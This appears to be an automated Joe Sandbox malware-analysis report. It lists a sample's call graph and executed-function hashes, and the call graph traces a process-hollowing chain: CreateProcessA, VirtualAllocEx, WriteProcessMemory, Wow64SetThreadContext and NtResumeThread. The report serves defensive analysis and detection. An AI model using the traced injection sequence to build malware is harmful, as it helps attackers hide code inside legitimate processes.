8a82f6a 10 API calls 64651->64653 64654 8a82d65 10 API calls 64651->64654 64652->64642 64653->64652 64654->64652 64657 8a82d64 64655->64657 64656 8a82c75 64656->64647 64657->64656 64665 8a841b0 64657->64665 64674 8a841c0 64657->64674 64661 8a82d6f 64660->64661 64663 8a841b0 10 API calls 64661->64663 64664 8a841c0 10 API calls 64661->64664 64662 8a82c75 64663->64662 64664->64662 64666 8a841d5 64665->64666 64683 8a84291 64666->64683 64688 8a84210 64666->64688 64693 8a841ff 64666->64693 64698 8a8474e 64666->64698 64703 8a84208 64666->64703 64708 8a844d3 64666->64708 64667 8a841f7 64667->64656 64675 8a841d5 64674->64675 64677 8a84208 10 API calls 64675->64677 64678 8a8474e 10 API calls 64675->64678 64679 8a841ff 10 API calls 64675->64679 64680 8a84210 10 API calls 64675->64680 64681 8a84291 10 API calls 64675->64681 64682 8a844d3 10 API calls 64675->64682 64676 8a841f7 64676->64656 64677->64676 64678->64676 64679->64676 64680->64676 64681->64676 64682->64676 64685 8a84275 64683->64685 64684 8a84509 64684->64667 64685->64684 64713 8a84ab8 64685->64713 64728 8a84ac8 64685->64728 64690 8a8423d 64688->64690 64689 8a84509 64689->64667 64690->64689 64691 8a84ab8 10 API calls 64690->64691 64692 8a84ac8 10 API calls 64690->64692 64691->64690 64692->64690 64695 8a84232 64693->64695 64694 8a84509 64694->64667 64695->64694 64696 8a84ab8 10 API calls 64695->64696 64697 8a84ac8 10 API calls 64695->64697 64696->64695 64697->64695 64700 8a84275 64698->64700 64699 8a84509 64699->64667 64700->64699 64701 8a84ab8 10 API calls 64700->64701 64702 8a84ac8 10 API calls 64700->64702 64701->64700 64702->64700 64705 8a84210 64703->64705 64704 8a84509 64704->64667 64705->64704 64706 8a84ab8 10 API calls 64705->64706 64707 8a84ac8 10 API calls 64705->64707 64706->64705 64707->64705 64710 8a84275 64708->64710 64709 8a84509 64709->64667 64710->64709 64711 8a84ab8 10 API calls 64710->64711 64712 8a84ac8 10 API calls 64710->64712 64711->64710 64712->64710 64714 8a84add 64713->64714 64717 8a84aff 64714->64717 64743 8a858c5 64714->64743 64748 8a84d64 64714->64748 64753 8a85aac 64714->64753 64758 8a8546b 64714->64758 64762 8a85828 64714->64762 64767 8a84e73 64714->64767 64772 8a859f1 64714->64772 64777 8a850f0 64714->64777 64782 8a8563d 64714->64782 64788 8a85c7a 64714->64788 64792 8a8565a 64714->64792 64797 8a853b8 64714->64797 64717->64685 64729 8a84add 64728->64729 64730 8a84aff 64729->64730 64731 8a85828 2 API calls 64729->64731 64732 8a8546b 2 API calls 64729->64732 64733 8a85aac 2 API calls 64729->64733 64734 8a84d64 2 API calls 64729->64734 64735 8a858c5 2 API calls 64729->64735 64736 8a853b8 2 API calls 64729->64736 64737 8a8565a 2 API calls 64729->64737 64738 8a85c7a 2 API calls 64729->64738 64739 8a8563d 2 API calls 64729->64739 64740 8a850f0 2 API calls 64729->64740 64741 8a859f1 2 API calls 64729->64741 64742 8a84e73 2 API calls 64729->64742 64730->64685 64731->64730 64732->64730 64733->64730 64734->64730 64735->64730 64736->64730 64737->64730 64738->64730 64739->64730 64740->64730 64741->64730 64742->64730 64744 8a8546a 64743->64744 64745 8a84b93 64743->64745 64802 8a87a30 64744->64802 64807 8a87a21 64744->64807 64749 8a84d6e 64748->64749 64820 8a87b09 64749->64820 64825 8a87b18 64749->64825 64750 8a84dd4 64754 8a85acd 64753->64754 64756 8a87b18 2 API calls 64754->64756 64757 8a87b09 2 API calls 64754->64757 64755 8a85af5 64756->64755 64757->64755 64760 8a87a30 2 API calls 64758->64760 64761 8a87a21 2 API calls 64758->64761 64759 8a84b93 64760->64759 64761->64759 64763 8a85832 64762->64763 64838 8aa6e38 64763->64838 64842 8aa6e40 64763->64842 64764 8a84b93 64768 8a84e98 64767->64768 64846 8aa6c28 64768->64846 64850 8aa6c21 64768->64850 64769 8a84ec5 64769->64717 64773 8a8584e 64772->64773 64774 8a84b93 64772->64774 64775 8aa6e38 NtResumeThread 64773->64775 64776 8aa6e40 NtResumeThread 64773->64776 64775->64774 64776->64774 64778 8a85112 64777->64778 64780 8aa6c28 WriteProcessMemory 64778->64780 64781 8aa6c21 WriteProcessMemory 64778->64781 64779 8a84b93 64780->64779 64781->64779 64783 8a8564d 64782->64783 64784 8a84d64 64782->64784 64786 8a87b18 2 API calls 64784->64786 64787 8a87b09 2 API calls 64784->64787 64785 8a84dd4 64786->64785 64787->64785 64854 8a87d28 64788->64854 64859 8a87d38 64788->64859 64789 8a85c92 64793 8a85672 64792->64793 64864 8a86190 64793->64864 64868 8a86181 64793->64868 64794 8a8568a 64798 8a853e7 64797->64798 64800 8aa6c28 WriteProcessMemory 64798->64800 64801 8aa6c21 WriteProcessMemory 64798->64801 64799 8a84cbc 64799->64717 64800->64799 64801->64799 64803 8a87a45 64802->64803 64812 8aa6568 64803->64812 64816 8aa652f 64803->64816 64804 8a87a5e 64804->64745 64808 8a87a30 64807->64808 64810 8aa6568 Wow64SetThreadContext 64808->64810 64811 8aa652f Wow64SetThreadContext 64808->64811 64809 8a87a5e 64809->64745 64810->64809 64811->64809 64813 8aa65b1 Wow64SetThreadContext 64812->64813 64815 8aa6629 64813->64815 64815->64804 64817 8aa65b1 Wow64SetThreadContext 64816->64817 64819 8aa6629 64817->64819 64819->64804 64821 8a87b18 64820->64821 64830 8aa6ac8 64821->64830 64834 8aa6ac0 64821->64834 64822 8a87b4f 64822->64750 64826 8a87b2d 64825->64826 64828 8aa6ac8 VirtualAllocEx 64826->64828 64829 8aa6ac0 VirtualAllocEx 64826->64829 64827 8a87b4f 64827->64750 64828->64827 64829->64827 64831 8aa6b0c VirtualAllocEx 64830->64831 64833 8aa6b84 64831->64833 64833->64822 64835 8aa6b0c VirtualAllocEx 64834->64835 64837 8aa6b84 64835->64837 64837->64822 64839 8aa6e89 NtResumeThread 64838->64839 64841 8aa6ee0 64839->64841 64841->64764 64843 8aa6e89 NtResumeThread 64842->64843 64845 8aa6ee0 64843->64845 64845->64764 64847 8aa6c74 WriteProcessMemory 64846->64847 64849 8aa6d0d 64847->64849 64849->64769 64851 8aa6c74 WriteProcessMemory 64850->64851 64853 8aa6d0d 64851->64853 64853->64769 64855 8a87d38 64854->64855 64857 8aa6568 Wow64SetThreadContext 64855->64857 64858 8aa652f Wow64SetThreadContext 64855->64858 64856 8a87d66 64856->64789 64857->64856 64858->64856 64860 8a87d4d 64859->64860 64862 8aa6568 Wow64SetThreadContext 64860->64862 64863 8aa652f Wow64SetThreadContext 64860->64863 64861 8a87d66 64861->64789 64862->64861 64863->64861 64865 8a861a7 64864->64865 64866 8a861c9 64865->64866 64872 8a86686 64865->64872 64866->64794 64869 8a861a7 64868->64869 64870 8a861c9 64869->64870 64871 8a86686 2 API calls 64869->64871 64870->64794 64871->64870 64873 8a8668d 64872->64873 64877 8aa5da8 64873->64877 64881 8aa5d9d 64873->64881 64879 8aa5e28 CreateProcessA 64877->64879 64880 8aa6024 64879->64880 64883 8aa5e28 CreateProcessA 64881->64883 64884 8aa6024 64883->64884

                                                                                                              Executed Functions

                                                                                                              Function 08B7C940 Relevance: 16.2, Strings: 12, Instructions: 1174COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-2072453518
                                                                                                              • Opcode ID: 9bd8e41dd91d2374e393adfdabe836eb75155fc589a45c0bd8a1f4d68c3219df
                                                                                                              • Instruction ID: 5f6499d1ceaa984f7547de02085ed8d2a9174ddcce18b2f4581e2a5001772166
                                                                                                              • Opcode Fuzzy Hash: 9bd8e41dd91d2374e393adfdabe836eb75155fc589a45c0bd8a1f4d68c3219df
                                                                                                              • Instruction Fuzzy Hash: B9B2E734A00218CFDB24CFA4D994BADBBB5FF48301F154199E919AB2A9DB70ED85CF50
                                                                                                              Function 08B7CC67 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$4$$q$$q$$q$$q
                                                                                                              • API String ID: 0-3956183810
                                                                                                              • Opcode ID: 2348e05cbfa523dd555b85fb1bf84681784d4624f8b89baaa8f6e7b00ac2c481
                                                                                                              • Instruction ID: dcd708a37a1b48119829a2645a94bc9df8094ba27622ddb3f2b06d8a50f8c429
                                                                                                              • Opcode Fuzzy Hash: 2348e05cbfa523dd555b85fb1bf84681784d4624f8b89baaa8f6e7b00ac2c481
                                                                                                              • Instruction Fuzzy Hash: 6822C834A00218CFDB24DF64D994BADBBB1FF48305F158199E519AB2A9DB70ED82CF50
                                                                                                              Function 08AB0040 Relevance: 3.8, Strings: 2, Instructions: 1335COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1241 8ab0040-8ab006e 1242 8ab0070 1241->1242 1243 8ab0075-8ab0197 1241->1243 1242->1243 1247 8ab01bb-8ab01c7 1243->1247 1248 8ab0199-8ab01af 1243->1248 1249 8ab01c9 1247->1249 1250 8ab01ce-8ab01d3 1247->1250 1526 8ab01b5 call 8ab2bc8 1248->1526 1527 8ab01b5 call 8ab2bd0 1248->1527 1249->1250 1251 8ab020b-8ab0254 1250->1251 1252 8ab01d5-8ab01e1 1250->1252 1262 8ab025b-8ab0520 1251->1262 1263 8ab0256 1251->1263 1254 8ab01e8-8ab0206 1252->1254 1255 8ab01e3 1252->1255 1256 8ab196f-8ab1975 1254->1256 1255->1254 1258 8ab19a0 1256->1258 1259 8ab1977-8ab1997 1256->1259 1264 8ab19a1 1258->1264 1259->1258 1289 8ab0f50-8ab0f5c 1262->1289 1263->1262 1264->1264 1290 8ab0f62-8ab0f78 1289->1290 1291 8ab0525-8ab0531 1289->1291 1296 8ab0f80-8ab0f9a 1290->1296 1292 8ab0538-8ab065d 1291->1292 1293 8ab0533 1291->1293 1328 8ab065f-8ab0697 1292->1328 1329 8ab069d-8ab0726 1292->1329 1293->1292 1300 8ab1074-8ab107a 1296->1300 1301 8ab0f9f-8ab101c 1300->1301 1302 8ab1080-8ab10b8 1300->1302 1317 8ab104f-8ab1071 1301->1317 1318 8ab101e-8ab1022 1301->1318 1312 8ab1416-8ab141c 1302->1312 1315 8ab10bd-8ab12bf 1312->1315 1316 8ab1422-8ab146a 1312->1316 1409 8ab135e-8ab1362 1315->1409 1410 8ab12c5-8ab1359 1315->1410 1325 8ab146c-8ab14df 1316->1325 1326 8ab14e5-8ab1530 1316->1326 1317->1300 1318->1317 1321 8ab1024-8ab104c 1318->1321 1321->1317 1325->1326 1346 8ab1939-8ab193f 1326->1346 1328->1329 1356 8ab0728-8ab0730 1329->1356 1357 8ab0735-8ab07b9 1329->1357 1349 8ab1535-8ab15b7 1346->1349 1350 8ab1945-8ab196d 1346->1350 1369 8ab15b9-8ab15d4 1349->1369 1370 8ab15df-8ab15eb 1349->1370 1350->1256 1359 8ab0f41-8ab0f4d 1356->1359 1382 8ab07bb-8ab07c3 1357->1382 1383 8ab07c8-8ab084c 1357->1383 1359->1289 1369->1370 1371 8ab15ed 1370->1371 1372 8ab15f2-8ab15fe 1370->1372 1371->1372 1374 8ab1611-8ab1620 1372->1374 1375 8ab1600-8ab160c 1372->1375 1380 8ab1629-8ab1901 1374->1380 1381 8ab1622 1374->1381 1379 8ab1920-8ab1936 1375->1379 1379->1346 1415 8ab190c-8ab1918 1380->1415 1381->1380 1384 8ab171a-8ab1783 1381->1384 1385 8ab1788-8ab17f1 1381->1385 1386 8ab162f-8ab1698 1381->1386 1387 8ab169d-8ab1715 1381->1387 1388 8ab17f6-8ab185e 1381->1388 1382->1359 1434 8ab085b-8ab08df 1383->1434 1435 8ab084e-8ab0856 1383->1435 1384->1415 1385->1415 1386->1415 1387->1415 1421 8ab18d2-8ab18d8 1388->1421 1417 8ab13bf-8ab13fc 1409->1417 1418 8ab1364-8ab13bd 1409->1418 1432 8ab13fd-8ab1413 1410->1432 1415->1379 1417->1432 1418->1432 1423 8ab18da-8ab18e4 1421->1423 1424 8ab1860-8ab18be 1421->1424 1423->1415 1440 8ab18c0 1424->1440 1441 8ab18c5-8ab18cf 1424->1441 1432->1312 1447 8ab08ee-8ab0972 1434->1447 1448 8ab08e1-8ab08e9 1434->1448 1435->1359 1440->1441 1441->1421 1454 8ab0981-8ab0a05 1447->1454 1455 8ab0974-8ab097c 1447->1455 1448->1359 1461 8ab0a07-8ab0a0f 1454->1461 1462 8ab0a14-8ab0a98 1454->1462 1455->1359 1461->1359 1468 8ab0a9a-8ab0aa2 1462->1468 1469 8ab0aa7-8ab0b2b 1462->1469 1468->1359 1475 8ab0b3a-8ab0bbe 1469->1475 1476 8ab0b2d-8ab0b35 1469->1476 1482 8ab0bcd-8ab0c51 1475->1482 1483 8ab0bc0-8ab0bc8 1475->1483 1476->1359 1489 8ab0c53-8ab0c5b 1482->1489 1490 8ab0c60-8ab0ce4 1482->1490 1483->1359 1489->1359 1496 8ab0cf3-8ab0d77 1490->1496 1497 8ab0ce6-8ab0cee 1490->1497 1503 8ab0d79-8ab0d81 1496->1503 1504 8ab0d86-8ab0e0a 1496->1504 1497->1359 1503->1359 1510 8ab0e19-8ab0e9d 1504->1510 1511 8ab0e0c-8ab0e14 1504->1511 1517 8ab0e9f-8ab0ea7 1510->1517 1518 8ab0eac-8ab0f30 1510->1518 1511->1359 1517->1359 1524 8ab0f3c-8ab0f3e 1518->1524 1525 8ab0f32-8ab0f3a 1518->1525 1524->1359 1525->1359 1526->1247 1527->1247
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 2$$q
                                                                                                              • API String ID: 0-2017333547
                                                                                                              • Opcode ID: 32a7de17477a75709eb257f4f82eb622ba7f14d1d05e1dff69ce6420360f9803
                                                                                                              • Instruction ID: cbd90d5bba6c108b6811d3a418f898f516ea3c0991a30c16ef322def709463ca
                                                                                                              • Opcode Fuzzy Hash: 32a7de17477a75709eb257f4f82eb622ba7f14d1d05e1dff69ce6420360f9803
                                                                                                              • Instruction Fuzzy Hash: 38E2C374E046288FDB64DF69D8847DABBB6FB89305F1081E9D809A7355DB30AE81CF41
                                                                                                              Function 08AA1E48 Relevance: 3.1, Strings: 2, Instructions: 629COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1562 8aa1e48-8aa1e69 1563 8aa1e6b 1562->1563 1564 8aa1e70-8aa1eed 1562->1564 1563->1564 1655 8aa1ef3 call 8aa29e8 1564->1655 1656 8aa1ef3 call 8aa29f8 1564->1656 1569 8aa1ef9-8aa1f36 1571 8aa1f38-8aa1f43 1569->1571 1572 8aa1f45 1569->1572 1573 8aa1f4f-8aa206a 1571->1573 1572->1573 1584 8aa207c-8aa20a7 1573->1584 1585 8aa206c-8aa2072 1573->1585 1586 8aa28cb-8aa28e7 1584->1586 1585->1584 1587 8aa20ac-8aa222a 1586->1587 1588 8aa28ed-8aa2908 1586->1588 1599 8aa223c-8aa23d8 1587->1599 1600 8aa222c-8aa2232 1587->1600 1611 8aa23da-8aa23de 1599->1611 1612 8aa243d-8aa2447 1599->1612 1600->1599 1613 8aa23e0-8aa23e1 1611->1613 1614 8aa23e6-8aa2438 1611->1614 1615 8aa26a4-8aa26c3 1612->1615 1616 8aa2749-8aa27b4 1613->1616 1614->1616 1617 8aa26c9-8aa26f3 1615->1617 1618 8aa244c-8aa25ad 1615->1618 1634 8aa27c6-8aa2811 1616->1634 1635 8aa27b6-8aa27bc 1616->1635 1623 8aa2746-8aa2747 1617->1623 1624 8aa26f5-8aa2743 1617->1624 1648 8aa269d-8aa269e 1618->1648 1649 8aa25b3-8aa269a 1618->1649 1623->1616 1624->1623 1636 8aa28b0-8aa28c8 1634->1636 1637 8aa2817-8aa28af 1634->1637 1635->1634 1636->1586 1637->1636 1648->1615 1649->1648 1655->1569 1656->1569
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$8
                                                                                                              • API String ID: 0-1651916650
                                                                                                              • Opcode ID: 623b17728cc2a621b6effd4a1d41c75edfe2f4eff874b10b90deb9019c7d6609
                                                                                                              • Instruction ID: 459451ab7cc3130b25fdbe941d3781ebb5bcdb1ccc0d2d35a934ba03f7a6c92c
                                                                                                              • Opcode Fuzzy Hash: 623b17728cc2a621b6effd4a1d41c75edfe2f4eff874b10b90deb9019c7d6609
                                                                                                              • Instruction Fuzzy Hash: 4062C575E002298FDB64DF69C894BD9B7B1FF89301F5082AAD909A7751DB30AE81CF50
                                                                                                              Function 08B78700 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2060 8b78700-8b7872b 2061 8b78732-8b7877f 2060->2061 2062 8b7872d 2060->2062 2065 8b78782-8b78788 2061->2065 2062->2061 2066 8b78791-8b787c4 2065->2066 2067 8b7878a-8b78f1a 2065->2067 2073 8b787c6-8b787cc 2066->2073 2074 8b78f26-8b78f4f 2067->2074 2075 8b787d5-8b787d6 2073->2075 2076 8b787ce 2073->2076 2074->2065 2077 8b78f55-8b78f5b 2074->2077 2082 8b7889e-8b788e4 2075->2082 2076->2075 2078 8b788f7-8b789c4 2076->2078 2079 8b789d5-8b78a70 call 8b784a8 2076->2079 2080 8b78a75-8b78aba 2076->2080 2081 8b78b72-8b78b95 2076->2081 2076->2082 2083 8b787db-8b78860 call 8b784a8 2076->2083 2077->2065 2078->2073 2168 8b789ca-8b789d0 2078->2168 2079->2073 2120 8b78ac4-8b78ac9 2080->2120 2121 8b78abc-8b78ac2 2080->2121 2086 8b78b97-8b78b9f 2081->2086 2087 8b78b60-8b78b66 2081->2087 2082->2073 2122 8b788ea-8b788f2 2082->2122 2171 8b78866 call 8b791d0 2083->2171 2172 8b78866 call 8b791c0 2083->2172 2086->2087 2090 8b78b6f-8b78b70 2087->2090 2091 8b78b68 2087->2091 2090->2081 2091->2081 2091->2090 2095 8b78e97-8b78ee3 2091->2095 2096 8b78e94-8b78e95 2091->2096 2097 8b78ef0 2091->2097 2098 8b78c5b-8b78c9e 2091->2098 2099 8b78d5b-8b78d5c 2091->2099 2100 8b78e25-8b78e26 2091->2100 2101 8b78ba1-8b78bf7 2091->2101 2102 8b78d0e-8b78d51 2091->2102 2103 8b78dcc-8b78e18 2091->2103 2104 8b78caa 2091->2104 2105 8b78c08-8b78c25 2091->2105 2136 8b78e7f-8b78e88 2095->2136 2156 8b78ee5-8b78eee 2095->2156 2106 8b78ef1 2096->2106 2097->2106 2133 8b78c49-8b78c4f 2098->2133 2155 8b78ca0-8b78ca8 2098->2155 2131 8b78db7-8b78dc0 2099->2131 2100->2136 2101->2087 2152 8b78bfd-8b78c03 2101->2152 2125 8b78cfc-8b78d02 2102->2125 2149 8b78d53-8b78d59 2102->2149 2103->2131 2153 8b78e1a-8b78e23 2103->2153 2115 8b78cab 2104->2115 2105->2115 2119 8b78c2b-8b78c3f 2105->2119 2128 8b78ef2 2106->2128 2115->2125 2132 8b78c41-8b78c47 2119->2132 2119->2133 2134 8b78ace-8b78b19 2120->2134 2135 8b78acb-8b78acc 2120->2135 2121->2120 2122->2073 2126 8b78d04 2125->2126 2127 8b78d0b-8b78d0c 2125->2127 2126->2095 2126->2096 2126->2097 2126->2099 2126->2100 2126->2102 2126->2103 2127->2099 2127->2102 2128->2128 2139 8b78dc2 2131->2139 2140 8b78dc9-8b78dca 2131->2140 2132->2133 2143 8b78c51 2133->2143 2144 8b78c58-8b78c59 2133->2144 2163 8b78b23-8b78b28 2134->2163 2164 8b78b1b-8b78b21 2134->2164 2135->2134 2145 8b78e91-8b78e92 2136->2145 2146 8b78e8a 2136->2146 2139->2095 2139->2096 2139->2097 2139->2100 2139->2103 2140->2100 2140->2103 2143->2095 2143->2096 2143->2097 2143->2098 2143->2099 2143->2100 2143->2102 2143->2103 2143->2104 2143->2144 2144->2098 2145->2096 2145->2097 2146->2095 2146->2096 2146->2097 2149->2125 2152->2087 2153->2131 2155->2133 2156->2136 2160 8b7886c-8b7888b 2160->2073 2162 8b78891-8b78899 2160->2162 2162->2073 2166 8b78b2d-8b78b4a 2163->2166 2167 8b78b2a-8b78b2b 2163->2167 2164->2163 2173 8b78b50 call 8b794b1 2166->2173 2174 8b78b50 call 8b794c0 2166->2174 2167->2166 2168->2073 2170 8b78b56-8b78b5e 2170->2087 2171->2160 2172->2160 2173->2170 2174->2170
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: 9c99cdb8e04dcfdb409b658ac49a969d723d04ccfd3f8941f5742dac17de1b37
                                                                                                              • Instruction ID: 4908865dac370ce947d1e9383bfb941032530e819abc3568130def6588b23146
                                                                                                              • Opcode Fuzzy Hash: 9c99cdb8e04dcfdb409b658ac49a969d723d04ccfd3f8941f5742dac17de1b37
                                                                                                              • Instruction Fuzzy Hash: 3E120674E05218CFEB64CF69D848B99BBF2FB49301F1080A9D919A7355DB306D81CF45
                                                                                                              Function 08A97490 Relevance: 2.2, Strings: 1, Instructions: 909COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 4672f9ae5a356933e8d337dd8290d6a506fa0585a9be4aff61a542949dd75fc0
                                                                                                              • Instruction ID: fc1ccb28b5bda0caacff2f936ac458beebfa3ea2974c0983b9bc3240b7c01183
                                                                                                              • Opcode Fuzzy Hash: 4672f9ae5a356933e8d337dd8290d6a506fa0585a9be4aff61a542949dd75fc0
                                                                                                              • Instruction Fuzzy Hash: B672A931B046058FDB19CF69C49476EBBF2FF88301F28852DD59A97791CB34A842CBA5
                                                                                                              Function 08AA55B2 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 08AA566D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2706961497-0
                                                                                                              • Opcode ID: 7d840e52adf2b887487caaff5c4a4a794de033cf3a6fb0b54de5325b996dcf83
                                                                                                              • Instruction ID: ce70141a5d804672ca2880da188616211a0c6094cad5470380d9862dbebc018f
                                                                                                              • Opcode Fuzzy Hash: 7d840e52adf2b887487caaff5c4a4a794de033cf3a6fb0b54de5325b996dcf83
                                                                                                              • Instruction Fuzzy Hash: 5141A8B8D012589FCF10DFA9D980AEEFBB5BB09310F14902AE815B7200C735A902CF68
                                                                                                              Function 08AA55B8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 08AA566D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2706961497-0
                                                                                                              • Opcode ID: 1b51f6fd409c83ea5a672b6c9b84d38fa58a8fb1b04d52448f099e2255103428
                                                                                                              • Instruction ID: ea5e366bde9772988bc0b55df1f3bf66613a4535fea4b0406e94534c6448cbf3
                                                                                                              • Opcode Fuzzy Hash: 1b51f6fd409c83ea5a672b6c9b84d38fa58a8fb1b04d52448f099e2255103428
                                                                                                              • Instruction Fuzzy Hash: 6F4199B4D012589FCF10DFAAD980ADEFBB5BB09310F14942AE815B7300D735A941CF68
                                                                                                              Function 08AA6E38 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 08AA6ECE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: e2170ee4ae9078285a3db0be8c5f7f5c2b8d6ce777f596aa700e2835a7d733a0
                                                                                                              • Instruction ID: 4eb3582e3f7b455e6fc7a3e3de78d75340f006e784c4686a77832ddc0b7b4e3a
                                                                                                              • Opcode Fuzzy Hash: e2170ee4ae9078285a3db0be8c5f7f5c2b8d6ce777f596aa700e2835a7d733a0
                                                                                                              • Instruction Fuzzy Hash: 0331CBB4D012189FCF20CFA9D984AEEFBF1BB59310F14942AE815B7600C775A906CF54
                                                                                                              Function 08AA6E40 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 08AA6ECE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 53ef2cfa48ed2720dc319410b088db6fd07c075818bedda1a7f1f7c397b41e9c
                                                                                                              • Instruction ID: 4b9161daad5b753936c46eb94ca234c6e796c4e676da8665ad49a152ee9a8532
                                                                                                              • Opcode Fuzzy Hash: 53ef2cfa48ed2720dc319410b088db6fd07c075818bedda1a7f1f7c397b41e9c
                                                                                                              • Instruction Fuzzy Hash: 1831A9B4D012189FCF20DFAAD980AAEFBF5BB59310F14942AE814B7300D775A946CF94
                                                                                                              Function 08A9D518 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PHq
                                                                                                              • API String ID: 0-3820536768
                                                                                                              • Opcode ID: 119c02492fe646539775e367990692bdf081ca1dabcbd5cce35727a33ba040fe
                                                                                                              • Instruction ID: c66667374327499c4393bef0fb60d7b400ff92359a514e9ae4ba6767d125a257
                                                                                                              • Opcode Fuzzy Hash: 119c02492fe646539775e367990692bdf081ca1dabcbd5cce35727a33ba040fe
